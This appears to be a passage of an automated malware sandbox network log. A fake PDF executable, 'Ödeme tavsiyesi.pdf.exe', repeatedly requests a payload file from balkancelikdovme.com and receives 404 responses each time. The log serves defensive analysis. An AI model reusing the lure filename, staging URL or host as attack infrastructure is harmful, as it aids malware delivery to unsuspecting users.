      2024-12-16 13:26:20 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      59192.168.2.549978185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:21 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:22 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:21 GMT
      vary: User-Agent
      2024-12-16 13:26:22 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      60192.168.2.549982185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:23 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:24 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:23 GMT
      vary: User-Agent
      2024-12-16 13:26:24 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      61192.168.2.549987185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:25 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:25 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:25 GMT
      vary: User-Agent
      2024-12-16 13:26:25 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      62192.168.2.549990185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:27 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:27 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:27 GMT
      vary: User-Agent
      2024-12-16 13:26:27 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      63192.168.2.549996185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:29 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:29 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:29 GMT
      vary: User-Agent
      2024-12-16 13:26:29 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      64192.168.2.550002185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:31 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:31 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:31 GMT
      vary: User-Agent
      2024-12-16 13:26:31 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      65192.168.2.550008185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:32 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:33 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:33 GMT
      vary: User-Agent
      2024-12-16 13:26:33 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      66192.168.2.550014185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:34 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:35 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:35 GMT
      vary: User-Agent
      2024-12-16 13:26:35 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      67192.168.2.550019185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:36 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:37 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:37 GMT
      vary: User-Agent
      2024-12-16 13:26:37 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      68192.168.2.550025185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:38 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:39 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:38 GMT
      vary: User-Agent
      2024-12-16 13:26:39 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      69192.168.2.550027185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:40 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:41 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:40 GMT
      vary: User-Agent
      2024-12-16 13:26:41 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      70192.168.2.550033185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:42 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:42 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:42 GMT
      vary: User-Agent
      2024-12-16 13:26:42 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      71192.168.2.550039185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:44 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:44 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:44 GMT
      vary: User-Agent
      2024-12-16 13:26:44 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      72192.168.2.550045185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:46 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:46 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:46 GMT
      vary: User-Agent
